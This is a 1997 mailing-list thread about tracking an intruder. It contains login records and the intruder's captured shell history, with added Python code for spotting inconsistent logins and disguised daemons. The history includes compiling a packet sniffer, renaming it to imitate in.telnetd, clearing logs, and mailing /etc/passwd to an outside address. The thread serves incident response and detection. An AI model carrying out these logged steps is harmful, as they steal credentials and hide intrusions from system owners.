System Attack & FBI (fwd)
Hi,

For your amusement.

Jim Choate
CyberTects
ravage@ssz.com

Forwarded message:

From ravage@ssz.com Fri May 23 23:28:29 1997
From: Jim Choate <ravage@ssz.com>
Message-Id: <199705240428.XAA22380@einstein.ssz.com>
Subject: System Attack & FBI
To: users@einstein.ssz.com
Date: Fri, 23 May 1997 23:28:27 -0500 (CDT)
Cc: staff@einstein.ssz.com
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 7477
Hi,
As you will see below I have been tracking a waskelly wabbit for the last few weeks. I apologize for any interference with your access but I could not let it go without some sort of response.
I *STRONGLY* advise you to change your password immediately.
I do not expect anyone other than myself to have to talk with the FBI.
If you have any questions please feel free to email me.
Jim Choate CyberTects ravage@ssz.com
Forwarded message:
From rberger@rberger.com Fri May 23 23:13:34 1997
Message-Id: <3.0.1.32.19970523234327.006eefec@rberger.com>
X-Sender: rberger@rberger.com
X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
Date: Fri, 23 May 1997 23:43:27 -0500
To: Jim Choate <ravage@einstein.ssz.com>
From: rberger <rberger@rberger.com>
Subject: Re: You have a hacker!
In-Reply-To: <199705240343.WAA22299@einstein.ssz.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Thank you very much for sending us an e-mail and your logs. We are going through our FTP logs at this time, although initial results don't show corresponding FTPs at these times or files. A week ago we were fighting a hacker using the same techniques as shown by the telnet sessions, so we will be monitoring everything very closely here for a few more days. Our next search will be the accounts logged in on these ports at the times given. We have been working with the FBI, along with several other ISPs in Dallas. If you capture any other logs please send them again to root@applink.net. If you don't hear anything from us in less than 24 hours please re-send your e-mail message to my domain, rberger@rberger.com, just in case the root e-mail/logs are being monitored & modified.

Regards,

Randall Berger, CEO
AppLink Corporation
At 10:43 PM 5/23/97 -0500, you wrote:
Hello,
My name is Jim Choate. I own and operate CyberTects, a small office/home office consultancy in Austin, TX. Over the last couple of weeks I have been tracking an intrusion on my system that has involved your systems. I would appreciate any help you can provide in resolving this issue.
I believe a home account for the perp is dkny007@hotmail.com
I will attach below the relevant files.
Jim Choate CyberTects ravage@ssz.com
--------------------------------------------------------------------------
bbixler ttyp0 app42-73.applink Fri May 23 16:04 - 16:06 (00:01)
bbixler ttyp0 app42-75.applink Fri May 23 00:21 - 00:28 (00:07)
bbixler ttyp0 app42-90.applink Thu May 22 13:33 - 13:37 (00:03)
bbixler ttyp0 app41-50.applink Wed May 21 20:01 - 20:31 (00:30)
bbixler ttyp0 app41-47.applink Wed May 21 19:53 - 19:54 (00:00)
bbixler ttyp0 app42-85.applink Wed May 21 18:46 - 19:00 (00:14)
bbixler ttyp0 app42-75.applink Wed May 21 10:39 - 10:40 (00:00)
bbixler ttyp0 app41-52.applink Sun May 18 23:04 - 23:11 (00:07)
bbixler ttyp1 app42-78.applink Sat May 17 18:46 - 18:49 (00:02)
bbixler ttyp1 app42-67.applink Sat May 17 01:22 - 01:26 (00:03)
bbixler ftp   fw6-10.ppp.iadfw Wed May 14 22:27 - 22:28 (00:01)
bbixler ttyp1 app42-94.applink Tue May 13 16:12 - 16:18 (00:05)
bbixler ttyp0 app42-85.applink Mon May 12 17:02 - 17:05 (00:02)
bbixler ttyp0 app42-73.applink Sun May 11 12:29 - 12:36 (00:07)
bbixler ttyp0 app42-71.applink Sat May 10 20:15 - 20:17 (00:01)
bbixler ttyp0 app42-71.applink Sat May 10 19:40 - 19:50 (00:09)
bbixler ttyp0 max2-800-04.eart Wed Feb 12 18:05 - 18:06 (00:00)
wtmp begins Sun Feb 2 16:36
--------------------------------------------------------------------------
whoami
ls
mv perl-ex.sh /tmp/.bgg
mkdir /tmp/.bg
cd /tmp
cd .bg
ls
lynx
ls
gcc linsniffer.c
ls
ps
who
w
ps aux
a.out &
ls
ifconfig
/sbin/ifconfig
ls
tail -f tcp.log
free
ls
cat tcp.log
cd ..
ls
w
cd
cd ..
ls
cd ..
cd /etc
ls
minicom
cd ..
ls
cd cdrom.
cd cdrom
ls
cd ..
cd
ls
cd bin
ls
cd ..
cd ..
ls
w
finger
cd Pphantom
cat /etc/passwd | grep Pphantom
cd phantom
ls
ls -al
cat .bash_history
cd /etc
cat hosts
ls
cd /tmp
cd .bg
cat tcp.log
exit
cd .bg
ls
w
ls
ls -al
cat tcp.log
ifconfig
/sbin/ifconfig
ls
exit
mv x.sh /tmp
cd .bg
ls
cd /tmp
ls
mv x.sh .bg
cd .bg
ls
kill -9 14523
ps aux
mv a.out in.telnetd
ls
rm tcp.log
./in.telnetd &
exit
pico tcp.log
ls
ps aux
kill -9 16282
ls
./in.telnetd &
exit
cat /dev/null > tcp.log
w
exit
pico tcp.log
ls
ls -al
cd /etc
cat passwd
mail dkny007@hotmail.com < passwd
exit
w
ls -al
pico tcp.log
echo /dev/null > tcp.log
ls -al
ps aux
quit
exit
id
w
ftp
ls
mkdir /home/ftp/.tmp
mkdir /home/ftp/.tmp/.sub
mv linsniff /home/ftp/.tmp/.sub/
cd /home/ftp/.tmp/.sub/
mv linsniff in.te1netd
ls -l
chmod 755 in.te1netd
in.te1netd &
ps
ps aux
killall in.te1netd
ls
ls -a
ls -l
in.te1netd &
/home/ftp/.tmp/.sub/in.te1netd
/home/ftp/.tmp/.sub/in.te1netd
ls -s
rm in.te1netd
cd
ls
mv hello .h311o
ftp
ls
mv linsniffer.c /home/ftp/.tmp/.sub/
cd /home/ftp/.tmp/.sub
ls
cc linsniffer.c
mv a.out in.te1netd
chmod 755 in.te1netd
ls
rm linsniffer.c
in.te1netd &
exit
cd ..
mv apache.tgz .bg
cd .bg
ls
tar xfvz apache.tgz
cd apache_1.2b10/
ls
cd src
make
ls
./Configure
make
ls
cd ..
ls
cd cgi-bin/
ls
cd ..
ls
cd ..
ls
w
rm -rf apache*
lynx
ls
tar xfvz apache_1.1.3.tar.gz
cd apache_1.1.3
ls
cd src
ls
./Configure
make
ls
cd ..
ls
cd ..
ls
rm -rf apache_1.1.3
ls
rm -rf apache_1.1.3.tar.gz
w
exit
kill -9 14551
ls
ls -al
cd ..
ls
cd /home
ls
cd ftp
ls -al
cd .tm[p
cd .tmp/
ls
ls -al
cd .sub/
ls
rm *
cd ..
cd ..
rm -rf .tmp/
ls
cd
ls
cd /root
ls
cd ssz
ls
cd ..
ls
cd pgp
ls
cd ..
cd etc
ls
cd ..
ls
cd /
ls
exit
id
crontab -e
ls
vi .sub
crontab -e
ls
cat /home/ftp/.tmp/.sub/tcp.log
ps aux
who
cd /home/ftp
ls -a
mkdir .tmp/.sub
mkdir .tmp
cd .tmp
exit
cd
ls
cd /root
ls
cd khg-0.5/
ls
cd ..
cat .bash_history
ls
cd /etc
ls
cat hosts
exit
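The wtmp excerpt above shows one account logging in from two different dialup providers and once over FTP from a third. The following added example (not part of the original thread or of anyone's posted tooling) parses `last`-style records and flags accounts whose login origins are inconsistent; the bbixler lines are copied from the excerpt, the 'alice' line and the network heuristic are assumptions of the example.

```python
import re
from collections import defaultdict

# Sample in the format of `last` output. The bbixler records are taken from the
# wtmp excerpt in the message above; the 'alice' line is constructed for contrast.
# `last` truncates hostnames to 16 characters, hence 'applink' / 'eart' / 'iadfw'.
SAMPLE_LAST = """\
bbixler  ttyp0  app42-73.applink  Fri May 23 16:04 - 16:06  (00:01)
bbixler  ttyp0  app41-50.applink  Wed May 21 20:01 - 20:31  (00:30)
bbixler  ftp    fw6-10.ppp.iadfw  Wed May 14 22:27 - 22:28  (00:01)
bbixler  ttyp0  max2-800-04.eart  Wed Feb 12 18:05 - 18:06  (00:00)
alice    ttyp1  dialup3.example   Thu May 22 09:10 - 09:40  (00:30)
wtmp begins Sun Feb  2 16:36
"""

RECORD = re.compile(
    r"^(?P<user>\S+)\s+(?P<tty>\S+)\s+(?P<host>\S+)\s+"
    r"(?P<start>\w{3} \w{3}\s+\d+ \d\d:\d\d) - (?P<end>\S+)\s+\((?P<dur>[^)]*)\)"
)

def parse_last(text):
    """One dict per login record; the 'wtmp begins' trailer does not match."""
    return [m.groupdict() for m in map(RECORD.match, text.splitlines()) if m]

def network_of(host):
    """Heuristic network key: everything after the first dot ('app42-73.applink'
    -> 'applink'). Truncated names make this approximate, not a real domain."""
    return host.split(".", 1)[1] if "." in host else host

def suspicious_accounts(text):
    """Return {user: [reasons]} for accounts whose login origins are inconsistent:
    interactive sessions from more than one network, or FTP-only networks."""
    tty_nets, ftp_nets = defaultdict(set), defaultdict(set)
    for r in parse_last(text):
        bucket = ftp_nets if r["tty"] == "ftp" else tty_nets
        bucket[r["user"]].add(network_of(r["host"]))
    findings = {}
    for user in sorted(set(tty_nets) | set(ftp_nets)):
        reasons = []
        if len(tty_nets[user]) > 1:
            reasons.append("tty logins from several networks: " + ", ".join(sorted(tty_nets[user])))
        stray = ftp_nets[user] - tty_nets[user]
        if stray:
            reasons.append("ftp logins from networks never used interactively: " + ", ".join(sorted(stray)))
        if reasons:
            findings[user] = reasons
    return findings
```

On the sample, only bbixler is reported, for both the applink/eart split and the stray ppp.iadfw FTP login; a dialup user with one provider is not flagged.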
Jim, I was almost in tears as I was reading your logs. Instead of simply asking your users to change passwords (always a great idea!) please let them know that multiuser Unix systems never offer any real security or privacy to the users. I hope that the hacker did not leave any other trojans besides rogue Apache and in.telnetd.

igor

Jim Choate wrote:
- Igor.
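Igor's worry about leftover trojans points at the trick visible in the bash history: a sniffer renamed to in.telnetd, or to the look-alike in.te1netd, and run from hidden directories such as /tmp/.bg and /home/ftp/.tmp/.sub. The added example below (mine, not Igor's or Jim's) checks a process list for daemon names that only look right; the process sample, the daemon list and the system directories are assumptions of the example.

```python
# Daemon names worth protecting from imitation; in.telnetd and httpd are the
# two imitated on the page, the rest are assumed common targets of the same trick.
KNOWN_DAEMONS = {"in.telnetd", "in.ftpd", "httpd", "inetd", "syslogd", "sendmail"}
SYSTEM_DIRS = ("/sbin/", "/usr/sbin/", "/bin/", "/usr/bin/", "/usr/libexec/")
# Digits that pass for letters at a glance in a `ps` listing (1 for l, 0 for o, 5 for s).
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "5": "s"})

# Constructed sample: (process name, executable path) pairs as `ps` plus
# /proc/<pid>/exe would report them. The paths echo the hiding places in the
# bash history above; the legitimate entries are invented for contrast.
SAMPLE_PROCS = [
    ("in.telnetd", "/usr/sbin/in.telnetd"),
    ("in.telnetd", "/tmp/.bg/in.telnetd"),
    ("in.te1netd", "/home/ftp/.tmp/.sub/in.te1netd"),
    ("httpd", "/usr/sbin/httpd"),
    ("httpd", "/tmp/.bg/apache_1.1.3/src/httpd"),
]

def normalize(name):
    """Map look-alike digits to letters so 'in.te1netd' compares as 'in.telnetd'."""
    return name.translate(HOMOGLYPHS)

def hidden_component(path):
    """True if any directory on the path starts with a dot (e.g. /tmp/.bg/...)."""
    return any(part.startswith(".") for part in path.split("/")[1:-1])

def check_process(name, exe):
    """Return the reasons this process looks like a masquerading daemon.
    An empty list means nothing suspicious under these heuristics."""
    reasons = []
    canon = normalize(name)
    if canon in KNOWN_DAEMONS:
        if canon != name:
            reasons.append("look-alike name for %s" % canon)
        if not exe.startswith(SYSTEM_DIRS):
            reasons.append("daemon binary outside system dirs: %s" % exe)
    if hidden_component(exe):
        reasons.append("runs from a hidden directory")
    return reasons

def audit(procs):
    """Return {exe: reasons} for every process with at least one finding."""
    findings = {}
    for name, exe in procs:
        reasons = check_process(name, exe)
        if reasons:
            findings[exe] = reasons
    return findings
```

Against the sample, the two genuine daemons pass and the three copies planted under /tmp/.bg and /home/ftp/.tmp/.sub are reported, the in.te1netd one for all three reasons.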
ichudov@algebra.com (Igor Chudov @ home) writes:
> ...
> I hope that the hacker did not leave any other trojans besides rogue Apache and in.telnetd.
> ...

The cracker installed Stronghold[tm] on Jim's system? How despicable!

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps